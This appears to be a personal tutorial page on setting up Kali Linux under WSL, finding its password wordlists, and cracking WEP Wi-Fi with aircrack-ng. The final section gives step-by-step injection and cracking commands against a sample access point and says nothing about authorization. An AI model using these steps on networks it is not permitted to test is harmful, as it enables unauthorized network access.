Install Kali Linux in the Windows using WSL

Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux

Once rebooted, open the Windows App store and search for the “Kali Linux” application, or alternatively click here to go there directly. Install the app and enjoy Kali!

Install Kali Linux Metapackages

sudo apt update
sudo apt full-upgrade -y
sudo apt install -y kali-linux-default

Install Win-KeX

Win-KeX provides a Kali Desktop Experience for Windows Subsystem for Linux (WSL 2)

sudo apt update
sudo apt install -y kali-win-kex

To start Win-KeX in Window mode with sound support, run

kex --win -s

To start Win-KeX in Enhanced Session Mode with sound support and arm workaround, run

kex --esm --ip -s

To start Win-KeX in Seamless mode with sound support, run

kex --sl -s

Optional Steps

If you have the space, why not install “Kali with the lot”?

sudo apt install -y kali-linux-large

References
https://www.kali.org/blog/kali-linux-in-the-windows-app-store/
https://www.kali.org/docs/general-use/metapackages/
https://www.kali.org/docs/wsl/win-kex/

Kali Word List / Dictionaries

cd /usr/share/wordlists
gunzip rockyou.txt.gz
ls -lh /usr/share/wordlists/
total 51M
lrwxrwxrwx 1 root root  25 Jan  3 13:59 dirb -> /usr/share/dirb/wordlists
lrwxrwxrwx 1 root root  30 Jan  3 13:59 dirbuster -> /usr/share/dirbuster/wordlists
lrwxrwxrwx 1 root root  35 Jan  3 13:59 dnsmap.txt -> /usr/share/dnsmap/wordlist_TLAs.txt
lrwxrwxrwx 1 root root  41 Jan  3 13:59 fasttrack.txt -> /usr/share/set/src/fasttrack/wordlist.txt
lrwxrwxrwx 1 root root  45 Jan  3 13:59 fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists
lrwxrwxrwx 1 root root  46 Jan  3 13:59 metasploit -> /usr/share/metasploit-framework/data/wordlists
lrwxrwxrwx 1 root root  41 Jan  3 13:59 nmap.lst -> /usr/share/nmap/nselib/data/passwords.lst
-rw-r--r-- 1 root root 51M Mar  3  2013 rockyou.txt.gz
lrwxrwxrwx 1 root root  34 Jan  3 13:59 sqlmap.txt -> /usr/share/sqlmap/txt/wordlist.txt
lrwxrwxrwx 1 root root  25 Jan  3 13:59 wfuzz -> /usr/share/wfuzz/wordlist
root@kali:~#
root@kali:~# gunzip /usr/share/wordlists/rockyou.txt.gz
root@kali:~#
root@kali:~# wc -l /usr/share/wordlists/rockyou.txt; ls -lah /usr/share/wordlists/rockyou.txt
14344392 /usr/share/wordlists/rockyou.txt
-rw-r--r-- 1 root root 134M Mar  3  2013 /usr/share/wordlists/rockyou.txt
root@kali:~#

References
https://tools.kali.org/password-attacks/wordlists
https://www.wirelesshack.org/word-list-dictionaries-built-into-kali.html

Hack WEP Wi-Fi With Kali Linux & Aircrack-ng

list all of the wireless cards that support monitor (not injection) mode :

airmon-ng

put interface on monitor mode :

airmon-ng start [wifi interface name]
airmon-ng start wlan0

list all of the wireless networks in your area :

airodump-ng [monitor interface name]
airodump-ng mon0

WEP encrypted data packets needs to be captured :

airodump-ng -w [file name] -c [chanel name] --bssid [bssid] [monitor interface name]
airodump-ng -w /root/Desktop/hack01 -c 1 --bssid 78:54:2E:D6:9F:D5 wlan1mon

To speed up the IV’s open a third terminal window letting the second run capturing the data :

aireplay-ng -1 0 -a [bssid] [monitor interface name]
aireplay-ng -1 0 -a 78:54:2E:D6:9F:D5 wlan1mon

This will begin sending out ARP request and the data and the beacons should begin to grow quickly :

aireplay-ng -3 -b [bssid] [monitor interface name]
aireplay-ng -3 -b 78:54:2E:D6:9F:D5 wlan1mon

after collecting enough data (20000 is enough but 100000 is better) :

aircrack-ng [file name]
aircrack-ng hack01.cap

References :
http://www.wirelesshack.org/step-by-step-kali-linux-and-wireless-hacking-basics-wep-hacking-part-3.html